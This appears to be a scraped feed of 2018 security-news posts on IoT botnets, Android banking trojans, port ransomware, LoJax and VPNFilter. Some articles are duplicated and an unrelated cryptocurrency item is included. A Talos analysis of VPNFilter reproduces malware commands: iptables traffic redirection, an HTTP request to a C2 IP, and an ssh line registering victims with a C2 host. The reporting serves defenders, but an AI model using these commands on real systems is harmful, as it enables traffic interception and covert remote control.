According to the experts, the Torii botnet is being used for stealing data from compromised IoT devices. The bot exfiltrates several data from compromised devices, including hostname and process ID.

The malicious code has a modular structure that is capable of fetching and executing other commands and executables, it leverages multiple layers of encrypted communication to avoid detection.

Another peculiarity of the Torii botnet it that it implements more than six ways to achieve persistence on the infected devices.

“Afterwards, the dropper makes sure that the second stage payload is executed and that it will remain persistent. It is unique in that it is remarkably thorough in how it achieves persistence.” continues the analysis.

“It uses at least six methods to make sure the file remains on the device and always runs. And, not just one method is executed – it runs all of them.

    1. Automatic execution via injected code into ~\.bashrc
    2. Automatic execution via “@reboot” clause in crontab
    3. Automatic execution as a “System Daemon” service via systemd
    4. Automatic execution via /etc/init and PATH. Once again, it calls itself “System Daemon”
    5. Automatic execution via modification of the SELinux Policy Management
    6. Automatic execution via /etc/inittab

Torii infects devices with Telnet exposed and protected by weak credentials, it first executes a sophisticated script used to determines the architecture of the target.

The script then downloads the first-stage payload that acts as a dropper for the second-stage payload.

Experts said that the bot component communicates with the CnC with active polling in an endless loop, waiting for commands to execute. Once executed the command, the bot will reply with the results of its execution.

The samples analyzed by the expert were communicating with a command-and-control server that is located in Arizona.

At the time of the analysis, Telnet is the only vector used by the bot to compromise other devices.

According to BleepingComputer, the malicious code was also analyzed by the Italian cyber security expert Marco Ramilli who noticed similarities to the Persirai.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before.” concludes the analysis.

“Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the CnC, but  by communicating with the CnC, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use.”

Further details, including IoCs are reported in the analysis published by Avast.

Pierluigi Paganini

(Security Affairs – Torii IoT botnet, hacking)

The post Torii botnet, probably the most sophisticated IoT botnet of ever appeared first on Security Affairs.

Monero Price Analysis: XMR/USD Well Supported in Attempt to Clear Stubborn 15-week Range

The Monero price is being supported by a sturdy ascending trend line, running from 14th August, in its path to recovery. XMR/USD has been stuck within a stubborn range for 15-weeks now and will need stronger upside momentum to be breached. The Monero price has been showing some positive signs now over the past 6 […]

The post Monero Price Analysis: XMR/USD Well Supported in Attempt to Clear Stubborn 15-week Range appeared first on Hacked: Hacking Finance.

New Malware-as-a-Service Threat Targets Android Phones

Security researchers discovered an emerging malware-as-a-service threat from Russia that would allow cybercriminals to infect Android phones with malicious software and block users from running security solutions on their devices.

The offering, called Black Rose Lucy, has a dashboard that shows simulated victims in France Israel and Turkey. This led researchers at Check Point Research to conclude that the Russian-speaking developers have likely run demos for prospective cybercrime groups that are interested in attacking targets in those countries. China is another likely target because it is the largest market for Android devices.

“Given time it could easily become a new cyber Swiss Army Knife that enables worldwide hacker groups to orchestrate a wide range of attacks,” the researchers warned in a threat report dated Sept. 13.

Malware-as-a-service is very much like any traditional cloud service, but instead of subscribing to a harmless application in the cloud, cyberthieves can subscribe to black-market malware services that provide them with all the tools they need to execute attacks.

How Black Rose Lucy Works

Black Rose Lucy has two main components:

  1. Lucy Loader, a dashboard that allows users to control an entire botnet of victim devices and deploy additional malware payloads.
  2. Black Rose Dropper, which targets Android phones, collects victim device data and can install extra malware from a remote command-and-control (C&C) server.

To infect phones, the dropper prompts victims to enable the Android accessibility service for an application called Security of the System, which is actually the dropper, according to Check Point Research. When enabled, Black Rose Lucy can grant itself device administrative privileges. When it receives Android Package Kit (APK) files from the C&C server, it installs the files by simulating user clicks.

Black Rose Lucy also has self-protection features. If popular security solutions or system cleaners are launched, it simulates a user click to the “back” or “home” button to exit the tools. The dropper also blocks users from performing a factory reset.

The researchers noted that Black Rose Lucy is likely designed to target China because its dropper pays attention to Chinese security and system tool applications.

How to Protect Your Network From Malware-as-a-Service Threats

The threat alert issued on the IBM X-Force Exchange advised IT organizations to update their antivirus software, apply the latest patches to all applications and operating systems, and monitor their environments for indicators of compromise (IoCs).

Security experts also recommend conducting hands-on security awareness training that includes immersive simulations and promotes organizationwide security buy-in from the top down.

The post New Malware-as-a-Service Threat Targets Android Phones appeared first on Security Intelligence.

QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks

The QRecorder app in the Play Store impersonating a phone call and voice recording utility embedded a banking malware used to target European banks.

Security experts from ESET have discovered a malicious app in the official Google Play Store that impersonates a phone call and voice recording utility, it was hiding a banking malware used to target customers of European banks.

The malware, tracked as Razdel, is a variant of BankBot mobile banking Trojan.

According to the Czech Television, the malicious code targets apps from Raiffeisen Bank, as well as ČSOB and Česká Spořitelna.

Czech Police shared the identikit and pictures from ATM security camera of a money mule withdrawing money from one of the Prague ATM from affected victims accounts.

The malware was hidden in the QRecorder app and according to the ESET security researcher Lukas Stefanko, the banking Trojan was downloaded and installed by over 10,000.

QRecorder app malware

The malicious QRecorder app is able to intercept SMS two-factor authentication (2FA) messages and ask for permission to display overlays on top of legitimate bank apps to control what the user sees on his device.

To avoid raising suspicions, the malicious application correctly implements the audio recording features.

Stefanko discovered that the threat actor behind the operator sends commands to the app within 24 hours from installation, for example, it scans the device for specific banking apps.

Attacker leverages Google Firebase messages to communicate with compromised devices. If one of the targeted apps is installed on the device, before downloading payload it would request the user to activate Accessibility service and using this permission it would automatically download and execute the malicious payload.

Once the malicious payload is downloaded it sets triggers for legitimate banking apps. If one of the targeted apps is launched by the user, the malware displays overlay to steal credentials.

“Before downloading payload it would request user to activate Accessibility service and using this permission it would automatically download, install and open malicious payload.” wrote Stefanko.

“Once payload is downloaded it sets triggers for legitimate banking apps. If one of the targeted apps is launched it would create similar like looking activity that overlays official app demanding credentials.”

According to official statement of Czech police, QRecorder infected five victims in Czech Republic stealing a total of over 78,000 Euros from their accounts.

The analysis of the code revealed that the QRecorder malware is able to monitor a large number of banks, including Air Bank, Equa, ING, Bawag, Fio, Oberbank, and Bank Austria.

One of the most interesting aspects of this malware is that the threat actor created different payloads for each targeted bank.

QRecorder app was removed from the official Android store, below a video that shows how the app operates.

Pierluigi Paganini

(Security Affairs – QRecorder app, malware)

The post QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks appeared first on Security Affairs.

Security Affairs: Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona

Port of San Diego suffered a ransomware-based attack, a few days after the Port of Barcelona was hit by a cyber attack that caused several problems.

A few days ago the Port of Barcelona was hit by a cyber attack that caused several problems to the critical infrastructure, now another major international port was targeted by attackers.

The second attack was reported on September 25 and hit the Port of San Diego, in the United States.

Several computers at the Port of San Diego were infected with a ransomware, the incident impacted the processing park permits and record requests, along with other operations.

According to the officials, the ordinary operations, including ship access and public safety, have not been affected by the cyber attack.

“The Port of San Diego has experienced a serious cybersecurity incident that has disrupted the agency’s information technology systems. The Port first received reports of the disruption on Tuesday, September 25, 2018. The Port has mobilized a team of industry experts and local, regional, state and federal partners to minimize impacts and restore system functionality, with priority placed on public safety-related systems. The Harbor Police Department has alternative systems and procedures in place to minimize impacts to public safety.”  said Randa Coniglio, Chief Executive Officer for the Port of San Diego in a  statement published on the site of the port the day after the attack.

“Additionally, we have reported this disruption to the California Office of Emergency Services (Cal OES) and the County of San Diego Office of Emergency Services. Port employees are currently at work but have limited functionality, which may have temporary impacts on service to the public, especially in the areas of park permits, public records requests, and business services. No further information is available at this time; updates will be provided as information is available,” said Port of San Diego CEO Randa Coniglio.”

Port of San Diego hack

The operator at the port promptly reported to the California Office of Emergency Services and the County of San Diego Office of Emergency Services. Feds and the Department of Homeland Security launched an investigation into the attack.

In July the China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyber attack, according to COSCO a “local network breakdown” disrupted some systems in the United States.

Clearly, the series of “disruptive” cyber-attacks reported by three ports raises the discussion about the level of security of this kind of infrastructure.

Port authorities are privileged targets for hackers and they are often easy to attack.

The fear is that a threat actor is focusing his efforts against port worldwide.

Pierluigi Paganini

(Security Affairs – Pangu iOS 12 jailbreak, hacking)

The post Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona appeared first on Security Affairs.



Security Affairs

Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona

Port of San Diego suffered a ransomware-based attack, a few days after the Port of Barcelona was hit by a cyber attack that caused several problems.

A few days ago the Port of Barcelona was hit by a cyber attack that caused several problems to the critical infrastructure, now another major international port was targeted by attackers.

The second attack was reported on September 25 and hit the Port of San Diego, in the United States.

Several computers at the Port of San Diego were infected with a ransomware, the incident impacted the processing park permits and record requests, along with other operations.

According to the officials, the ordinary operations, including ship access and public safety, have not been affected by the cyber attack.

“The Port of San Diego has experienced a serious cybersecurity incident that has disrupted the agency’s information technology systems. The Port first received reports of the disruption on Tuesday, September 25, 2018. The Port has mobilized a team of industry experts and local, regional, state and federal partners to minimize impacts and restore system functionality, with priority placed on public safety-related systems. The Harbor Police Department has alternative systems and procedures in place to minimize impacts to public safety.”  said Randa Coniglio, Chief Executive Officer for the Port of San Diego in a  statement published on the site of the port the day after the attack.

“Additionally, we have reported this disruption to the California Office of Emergency Services (Cal OES) and the County of San Diego Office of Emergency Services. Port employees are currently at work but have limited functionality, which may have temporary impacts on service to the public, especially in the areas of park permits, public records requests, and business services. No further information is available at this time; updates will be provided as information is available,” said Port of San Diego CEO Randa Coniglio.”

Port of San Diego hack

The operator at the port promptly reported to the California Office of Emergency Services and the County of San Diego Office of Emergency Services. Feds and the Department of Homeland Security launched an investigation into the attack.

In July the China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyber attack, according to COSCO a “local network breakdown” disrupted some systems in the United States.

Clearly, the series of “disruptive” cyber-attacks reported by three ports raises the discussion about the level of security of this kind of infrastructure.

Port authorities are privileged targets for hackers and they are often easy to attack.

The fear is that a threat actor is focusing his efforts against port worldwide.

Pierluigi Paganini

(Security Affairs – Pangu iOS 12 jailbreak, hacking)

The post Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona appeared first on Security Affairs.

Phorpiex bots target remote access servers to deliver ransomware

Threat actors are brute-forcing their way into enterprise endpoints running server-side remote access applications and attempting to spread the GandCrab ransomware onto other enterprise computers, SecurityScorecard researchers are warning. Their weapon of choice is Phorpiex/Trik, a bot with worm capabilities that allows it to spread to other systems by copying itself to USBs and other removable drives. The campaign This rather unsophisticated piece of malware scans the internet for Remote Desktop Protocol (RDP) and Virtual … More

The post Phorpiex bots target remote access servers to deliver ransomware appeared first on Help Net Security.

Security Affairs: Talos experts published technical details for other seven VPNFilter modules

Experts from Talos continues to monitor the evolution of the VPNFilter malware, it is more powerful than previously thought.

In May, security firm Talos along with other cybersecurity firms and law enforcement agencies have uncovered a huge botnet dubbed VPNFilter, composed of more than 500,000 compromised routers and network-attached storage (NAS) devices.

The malicious code targets dozens of types of devices from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.

VPNFilter is a multi-stage, modular strain of malware that has a wide range of capabilities for both cyber espionage and sabotage purpose.

Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

According to the experts at Fortinet that analyzed the malware, VPNFilter operates in the following three stages:

  • Stage 1 implements a persistence mechanism and redundancy; it allows the malware to survive a reboot.
  • Stage 2 includes data exfiltration, command execution, file collection, and device management. Only in some versions it is present a self-destruct module.
  • Stage 3 includes multiple modules that perform different tasks. At the time researchers identified only three modules:
    • A packet sniffer for traffic analysis and potential data exfiltration.
    • The monitoring of MODBUS SCADA protocols.
    • Communication with obfuscated addresses via TOR

VPNFilter malware

Now a new report published by Talos includes technical details for other seven VPNFilter modules that are used by the attackers to map networks and compromise endpoints connected to infect devices, obfuscate and encrypt malicious traffic, exfiltrate data, communicate to the C&C, scan the compromised networks for new potential victims that can be reached from an infected device, and build a distributed network of proxies that may be used in future attacks to hide the source of malicious traffic.

Talos analysis shed the light on many aspects of the malware, except for the way the VPNFilter gains initial access to devices.

It is still unclear is the threat actors behind the botnet is attempting to reconstitute their access, but Talos researchers believe VPNFilter appears to have been completely neutralized.

“Based on our telemetry and information from our partners, it appears that VPNFilter has been entirely neutralized since we and our international coalition of partners (law enforcement, intelligence organizations, and the Cyber Threat Alliance) countered the threat earlier this year. Most C2 channels for the malware have been mitigated.” reads the report published by Talos.

“The stage 2 implants were non-persistent, so most have likely been cleared from infected devices. We have seen no signs of the actor attempting to reconnect with devices that may still have the persistent stage 1 with an open listener.”

Experts conclude the attackers behind VPNFilter are extremely capable and driven by their mission priorities, for this reason, they will continue to improve their arsenal to achieve their mission objective(s).

Pierluigi Paganini

(Security Affairs – VPNFilter, hacking)

The post Talos experts published technical details for other seven VPNFilter modules appeared first on Security Affairs.



Security Affairs

Talos experts published technical details for other seven VPNFilter modules

Experts from Talos continues to monitor the evolution of the VPNFilter malware, it is more powerful than previously thought.

In May, security firm Talos along with other cybersecurity firms and law enforcement agencies have uncovered a huge botnet dubbed VPNFilter, composed of more than 500,000 compromised routers and network-attached storage (NAS) devices.

The malicious code targets dozens of types of devices from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.

VPNFilter is a multi-stage, modular strain of malware that has a wide range of capabilities for both cyber espionage and sabotage purpose.

Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

According to the experts at Fortinet that analyzed the malware, VPNFilter operates in the following three stages:

  • Stage 1 implements a persistence mechanism and redundancy; it allows the malware to survive a reboot.
  • Stage 2 includes data exfiltration, command execution, file collection, and device management. Only in some versions it is present a self-destruct module.
  • Stage 3 includes multiple modules that perform different tasks. At the time researchers identified only three modules:
    • A packet sniffer for traffic analysis and potential data exfiltration.
    • The monitoring of MODBUS SCADA protocols.
    • Communication with obfuscated addresses via TOR

VPNFilter malware

Now a new report published by Talos includes technical details for other seven VPNFilter modules that are used by the attackers to map networks and compromise endpoints connected to infect devices, obfuscate and encrypt malicious traffic, exfiltrate data, communicate to the C&C, scan the compromised networks for new potential victims that can be reached from an infected device, and build a distributed network of proxies that may be used in future attacks to hide the source of malicious traffic.

Talos analysis shed the light on many aspects of the malware, except for the way the VPNFilter gains initial access to devices.

It is still unclear is the threat actors behind the botnet is attempting to reconstitute their access, but Talos researchers believe VPNFilter appears to have been completely neutralized.

“Based on our telemetry and information from our partners, it appears that VPNFilter has been entirely neutralized since we and our international coalition of partners (law enforcement, intelligence organizations, and the Cyber Threat Alliance) countered the threat earlier this year. Most C2 channels for the malware have been mitigated.” reads the report published by Talos.

“The stage 2 implants were non-persistent, so most have likely been cleared from infected devices. We have seen no signs of the actor attempting to reconnect with devices that may still have the persistent stage 1 with an open listener.”

Experts conclude the attackers behind VPNFilter are extremely capable and driven by their mission priorities, for this reason, they will continue to improve their arsenal to achieve their mission objective(s).

Pierluigi Paganini

(Security Affairs – VPNFilter, hacking)

The post Talos experts published technical details for other seven VPNFilter modules appeared first on Security Affairs.

Fancy Bear’s VPNfilter malware is back with 7 new modules

By Waqas

Cisco’s Talos researchers have identified that Russia’s VPNfilter is way more dangerous than it is believed to be. The malware, which prompted the FBI to urge people to reboot their internet routers, contains seven additional third-stage modules that are infecting countless global networking devices since 2016. The infected devices are mainly located in Ukraine as […]

This is a post from HackRead.com Read the original post: Fancy Bear’s VPNfilter malware is back with 7 new modules

Cybersecurity Researchers Spotted First-Ever UEFI Rootkit in the Wild

Cybersecurity researchers at ESET have unveiled what they claim to be the first-ever UEFI rootkit being used in the wild, allowing hackers to implant persistent malware on the targeted computers that could survive a complete hard-drive wipe. Dubbed LoJax, the UEFI rootkit is part of a malware campaign conducted by the infamous Sednit group, also known as APT28, Fancy Bear, Strontium, and

Russian Sednit APT used the first UEFI rootkit of ever in attacks in the wild

Security experts from ESET have spotted the first UEFI rootkit of ever, the code tracked as LoJax was used in attacks in the wild.

Security researchers from ESET have discovered a new piece of a sophisticated malware used by the Russia-linked Sednit group (aka Fancy BearAPT28Pawn StormSofacy Group, and STRONTIUM) in targeted attacks aimed at government entities in the Balkans as well as in Central and Eastern Europe.

The malicious code tracked as LoJax is considered the first UEFI rootkit used in attacks in the wild.

Security experts have debated for a long about UEFI rootkits that are very dangerous malware hard to detect and that could resist to the operating system reinstallation and even to the hard disk replacement.

“The discovery of the first in-the-wild UEFI rootkit is notable for two reasons.” reads the analysis published by ESET.

“First, it shows that UEFI rootkits are a real threat, and not merely an attractive conference topic.

And second, it serves as a heads-up, especially to all those who might be in the crosshairs of Sednit. This APT group, also known as APT28, STRONTIUM, Sofacy and Fancy Bear, may be even more dangerous than previously thought.”

The Sednit APT group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

The discovery marks a milestone in the evolution of the group, it represents an escalation in the complexity of its attacks, the cyber capabilities of the group may be even more dangerous than previously thought.

The LoJax UEFI rootkit borrows a portion of the code of the anti-theft software LoJack.

LoJack for laptops is a security software designed to catch computer thieves, but it could be theoretically abused to spy on legitimate owners of the device.

LoJack could be used to locate a stolen laptop, lock it or wipe its content, it is a precious application for enterprises that want to implement an additional protection of their assets.

Early this year, experts from Arbor Networks discovered several LoJack agents that were found to be connecting to servers that are believed to be controlled by the notorious Russia-linked Fancy Bear APT group.

“ASERT recently discovered Lojack agents containing malicious C2s. These hijacked agents pointed to suspected Fancy Bear (a.k.a. APT28, Pawn Storm) domains.” reads the report published by Netscout.

“ASERT has identified five Lojack agents (rpcnetp.exe) pointing to 4 different suspected domains.  Fancy Bear has been tied to three of the domains in the past.”

Five LoJack agents discovered by the experts were pointing to four C&C servers, three of which have been associated with past campaigns conducted by the Fancy Bear APT group.

LoJax exhibits rootkit-like capabilities, it is implemented as a UEFI/BIOS module to survive to the OS reinstallation and hard drive replacement.

“Since this software’s intent is to protect a system from theft, it is important that it resists OS re-installation or hard drive replacement.” continues the report.

“Thus, it is implemented as a UEFI/BIOS module, able to survive such events. This solution comes pre-installed in the firmware of a large number of laptops manufactured by various OEMs, waiting to be activated by their owners.”

The researchers from ESET revealed that the APT group was successful at least once in writing a malicious UEFI module into a system’s SPI flash memory.

The module was abused to drop and execute the malicious code on disk during the boot process. The only way to remove the malware is reflashing the UEFI firmware

UEFI rootkit LoJax

Moreover, cleaning a system’s UEFI firmware means re-flashing it, an operation not commonly done and certainly not by the typical user.

Experts linked the attacks to Sednit hackers thanks to the analysis of the code and the identification of the Command and Control infrastructure.

“As mentioned above, some of the LoJax small agent C&C servers were used in the past by SedUploader, a first-stage backdoor routinely used by Sednit’s operators. Also, in cases of LoJax compromise, traces of other Sednit tools were never far away.” concludes the report.

“In fact, systems targeted by LoJax usually also showed signs of these three examples of Sednit malware:

  • SedUploader, a first-stage backdoor
  • XAgent, Sednit’s flagship backdoor
  • Xtunnel, a network proxy tool that can relay any kind of network traffic between a C&C server on the Internet and an endpoint computer inside a local network

These facts allow us to attribute LoJax with high confidence to the Sednit group.”

The full list of Indicators of Compromise (IOCs) and samples was shared by ESET on GitHub.

Pierluigi Paganini

(Security Affairs – LoJax, UEFI rootkit)

The post Russian Sednit APT used the first UEFI rootkit of ever in attacks in the wild appeared first on Security Affairs.

LoJax: First-ever UEFI rootkit detected in a cyberattack

ESET researchers have discovered a cyberattack that used a UEFI rootkit to establish a presence on the victims’ computers. Dubbed LoJax, this rootkit was part of a campaign run by the infamous Sednit group against several high-profile targets in Central and Eastern Europe and is the first-ever publicly known attack of this kind. Boot process of a system infected by the UEFI rootkit “Although, in theory we were aware that UEFI rootkits existed, our discovery … More

The post LoJax: First-ever UEFI rootkit detected in a cyberattack appeared first on Help Net Security.

Blog | Avast EN: New Torii Botnet uncovered, more sophisticated than Mirai | Avast

written by Jakub Kroustek, Vladislav Iliushin, Anna Shirokova, Jan Neduchal and Martin Hron

Disclaimer: Analysis of the server content and samples was done on Thursday, September 20th. Follow the Avast Blog for further updates. 

Introduction

2018 has been a year where the Mirai and QBot variants just keep coming. Any script kiddie now can use the Mirai source code, make a few changes, give it a new Japanese-sounding name, and then release it as a new botnet.



Blog | Avast EN

SheIn Data Breach Exposed Personal Details 6.4 Million Customers To Hackers

After so many private and government organizations suffering data breaches, a US-based fashion retailer now enters the list. Reportedly, the

SheIn Data Breach Exposed Personal Details 6.4 Million Customers To Hackers on Latest Hacking News.

Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled

The latest samples of the HNS bot were designed to target Android devices having the wireless debugging feature ADB enabled.

The Hide and Seek (HNS) IoT botnet was first spotted early this year, since its discovery the authors continuously evolved its code.

The IoT botnet appeared in the threat landscape in January, when it was first discovered on January 10th by malware researchers from Bitdefender, then it disappeared for a few days, and appeared again a few weeks later infecting in a few days more than 20,000 devices.

The botnet initially spread infecting unsecured IoT devices, mainly IP cameras, in July security experts from Fortinet discovered that the Hide ‘N Seek botnet was improved to target vulnerabilities in home automation systems.

In the same month, experts from Netlab observed the Hide ‘N Seek botnet targeting also cross-platform database solutions. It is currently the first IoT malware that implements a persistence mechanism to keep devices infected after reboots.

The latest samples of the HNS bot were designed to target Android devices having the wireless debugging feature enabled instead of exploiting known vulnerabilities.

By default, Android has Android Debug Bridge (ADB) option disabled, but often vendors enable it to customize the operating system, then ship the devices with the feature turned on.

The authors of the HNS botnet are attempting to compromise new devices by exploiting the features.

“The newly identified samples add functionality by exploiting the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices, which developers normally use for troubleshooting.” reads the analysis published by BitDefender.

“While it’s traditionally disabled by default, some Android devices are shipped with it enabled, practically exposing users to remote connections via the ADB interface that’s accessible using the TCP port 5555. Any remote connection to the device is performed unauthenticated and allows for shell access, practically enabling attackers to perform any task in administrator mode.”

In February 2018, security researchers at Qihoo 360’s Netlab have spotted an Android mining botnet that was targeting devices with ADB interface open.

The recent improvement of the Hide and Seek botnet, allowed its operators to add 40,000 new devices, most of them in Taiwan, Korea, and China.

HnS ADB_exposed_Shodan

 

Expert pointed out that the HNS bot could infect any device, including smart TVs and DVRs, that has ADB over Wi-Fi enabled could be affected too.

“It’s safe to say that not just Android-running smartphones are affected — smart TVs, DVRs and practically any other device that has ADB over Wi-Fi enabled could be affected too.concludes Bitdefender.

“Considering the evidence at hand, we speculate the botnet operators are constantly adding new features to “enslave” as many devices as possible, although the true purpose of the botnet remains unknown.”

Pierluigi Paganini

(Security Affairs – HSN botnet, hacking)

 

The post Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled appeared first on Security Affairs.

VPNFilter III: More Tools for the Swiss Army Knife of Malware

https://3.bp.blogspot.com/-1OGddXBBf1s/WwTyd0k3szI/AAAAAAAAAgs/82oB9Lftark-aUd7aYp5WnpNcfiAvxKjwCLcBGAs/s1600/image2.jpg

Summary


VPNFilter — a multi-stage, modular framework that has infected hundreds of thousands of network devices across the globe — is now known to possess even greater capabilities. Cisco Talos recently discovered seven additional third-stage VPNFilter modules that add significant functionality to the malware, including an expanded ability to exploit endpoint devices from footholds on compromised network devices. The new functions also include data filtering and multiple encrypted tunneling capabilities to mask command and control (C2) and data exfiltration traffic. And while we believe our work, and the work of our international coalition of partners, has mostly neutralized the threat from VPNFilter, it can still be difficult to detect in the wild if any devices remain unpatched.

Talos has been researching VPNFilter for months. Our initial findings are outlined here, and a description of additional modules used by the framework is here. As part of our continued investigation, we developed a technique to examine a key protocol used by MikroTik networking devices to hunt for possible exploitation methods used by the actor.

As we followed the thread of VPNFilter infections, it became clear that MikroTik network devices were heavily targeted by the threat actor, especially in Ukraine. Since these devices seemed to be critical to the actor's operational goals, this led us to try to understand how they were being exploited. Part of our investigation included the study of the protocol used by MikroTik's Winbox administration utility. In this blog, we'll share how and why we studied this protocol, as well as the decoder tool we developed as a way of helping the security community look into this protocol for potential malicious actor activity.

The sophistication of VPNFilter drives home the point that this is a framework that all individuals and organizations should be tracking. Only an advanced and organized defense can combat these kinds of threats, and at the scale that VPNFilter is at, we cannot afford to overlook these new discoveries.


Expanded VPNFilter capabilities


The discovery of these additional VPNFilter third-stage modules has significantly added to our understanding of what we already knew to be an extremely potent threat. Together, these modules added:
  1. Additional capabilities that could be leveraged to map networks and exploit endpoint systems that are connected to devices compromised by VPNFilter.
  2. Multiple ways for the threat actor to obfuscate and/or encrypt malicious traffic, including communications used for C2 and data exfiltration.
  3. Multiple tools that could be utilized to identify additional victims accessible from the actor's foothold on devices compromised by VPNFilter for both lateral movement within a network, as well as to identify new edge devices in other networks of interest to the actor.
  4. The capacity to build a distributed network of proxies that could be leveraged in future unrelated attacks to provide a means of obfuscating the true source of attack traffic by making it appear as if the attacks originated from devices previously compromised by VPNFilter.

We were able to confirm the existence and capabilities of the malware after reverse-engineering these additional modules. Previously, we had to make analytic assessments on the existence and nature of these capabilities based solely on telemetry analysis, which always leaves room for error.

For example, we had previously noted what appeared to be devices compromised by VPNFilter conducting scans of large IP spaces that seemed focused on identifying other devices vulnerable to the methods of exploitation used by the actor associated with the VPNFilter malware. However, now we can discuss the specific third-stage module used for this activity.

As a result of our continued research, we have furthered our understanding of the full scope of the capabilities associated with VPNFilter after examining these additional third-stage modules.

Additional third-stage modules


As previously described, Talos identified the following seven additional third-stage modules that greatly expanded the capabilities present within VPNFilter.
Each of these modules is described in detail in the following sections.

'htpx' (endpoint exploitation module - executable injection)


'htpx' is a third-stage module for VPNFilter. This module shares similar code with the 'ssler' module previously documented by Talos. The module relies heavily on open-source code that can be traced to the original projects based on strings present within the binary. A good example is 'libiptc.c', which is part of Netfilter.
Comparison of strings between 'htpx' (left) and 'ssler' (right).

The primary function present within the 'htpx' module is responsible for setting up iptables rules to forward network traffic destined for TCP port 80 to a local server running on port 8888. This redirection is accomplished by first loading kernel modules that allow for traffic management. These modules (Ip_tables.ko, Iptable_filter.ko, and Iptable_nat.ko) are loaded with the insmod shell command.

The 'htpx' module then issues the following commands to surreptitiously forward traffic:

iptables -I INPUT -p tcp --dport 8888 -j ACCEPT
iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8888

It also periodically checks to ensure that these rules remain present by issuing similar delete commands then re-adding them. A temp file is also created called /var/run/htpx.pid.

The following HTTP request is then generated:

GET %s HTTP/1.1\r\nHost: 103.6.146.194\r\nAccept: */*\r\nUser-Agent: curl53\r\n\r\n

During our analysis of the 'htpx' module, we were unable to elicit a response from C2 infrastructure, so we were unable to observe additional module operations. During our analysis of the module binary, we identified that the module inspects HTTP communications to identify the presence of Windows executables. When they are encountered, the executable is flagged and added to a table. We assess with moderate confidence that this module could be leveraged by attackers to download a binary payload and allow for on-the-fly patching of Windows executables as they pass through compromised devices.

'ndbr' (multi-functional SSH tool)


The 'ndbr' module is a module with SSH capabilities that also has the ability to port-scan other IPs. This module uses the dropbear SSH server and client and is a modified version of the dbmulti utility version 2017.75. We have identified several modifications to the standard dropbear functionality.

The first modifications are to the dbmulti utility itself. The typical utility can function as an SSH client, SSH server, perform data transfers using SCP, generate keys, or convert keys based. The functionality is determined either by the program name or the first parameter passed to the program. The 'ndbr' module has replaced the ability to generate or convert keys with a network mapping (i.e., port-scanning) function as well as another function called 'ndbr.'

Like the original "dbmulti" utility, the 'ndbr' module's functionality depends either on the name of the program or the first argument passed to the program. The arguments that the 'ndbr' module accepts are dropbear, dbclient, ssh, scp, ndbr, and nmap. A description of each of these arguments can be found in the following sections.

dropbear


The dropbear command instructs the 'ndbr' module to operate as an SSH server. The original dropbear code uses the default SSH port (TCP/22) to listen for connections. However, the code present within the 'ndbr' module has been modified to use a default port of TCP/63914. Other modifications to the original dropbear code change the way that host keyfiles are handled. The default keyfile path has been changed to /db_key, but the 'ndbr' module does not drop this file. Instead, the buf_readfile dropbear function has been modified to load the proper key from memory when the filename parameter is equal to /db_key.

Instead of using password-based authentication, the dropbear server has been modified to authenticate via a proper public key, which is also embedded in the 'ndbr' executable. A bug in this modified code mishandles connections attempting to use an incorrect public key. These authentication failures cause the ndbr SSH server to become stuck in an infinite loop. There is no indication to the client, however, that the authentication has failed. At this time, we have been unable to identify a correct key that would allow for successful authentication with the ndbr SSH server — neither of the keys embedded in the 'ndbr' module (i.e., /db_key and /cli_key) were correct, and no corresponding keys were found in any other VPNFilter-related binaries.

dbclient (ssh)


If passed the dbclient or ssh parameter, the 'ndbr' module acts as the standard dropbear SSH command-line interface client but with modifications to its default options. As with the default keyfile with dropbear server command, the dbclient/ssh commands have a default identity file: /cli_key. At this time, we do not know what the dbclient (SSH client) is expected to connect to.

nmap


If passed the nmap argument, the 'ndbr' module will perform a port scan of an IP or range of IPs.

The usage is:

Usage %s -ip* <ip-addr: 192.168.0.1/ip-range 192.168.0.0./24> -p* <port: 80/port-range: 25-125> -noping <default yes> -tcp <default syn> -s <source ip> -h/--help (print this help)

ndbr


If passed the ndbr argument, the 'ndbr' module will do one of three operations based on the other parameters it is passed. The SSH commands will make use of the default keys (i.e., /db_key and /cli_key) as described above.

The third parameter must begin with the word "start," or the 'ndbr' module uninstalls itself.

If the ndbr module is executed using the following parameters:

$ ./ndbr_<arch> ndbr <param1> <param2> "start proxy <host> <port>"

The following dropbear SSH command will be executed:

ssh -y -p <port> prx@<host> srv_ping j(<B64 victim host name>)_<victim MAC address> <param2>

This causes the dropbear SSH client to connect to a remote host and issue the "srv_ping" command, which is likely used to register the victim with a C2 server.

If the ndbr module is executed using the following parameters:

`$ ./ndbr_<arch> ndbr <param1> <param2> "start -l <port>"`

The dropbear SSH server (as described above) is started and begins listening on the port specified:

`sshd -p <port>`

If the ndbr module is executed with the following parameters:

`$ ./ndbr_<arch> ndbr <param1> <param2> "start <user> <host> <port>"`

Remote port forwarding is set up by executing the following dropbear command (see above for explanation of the command options):

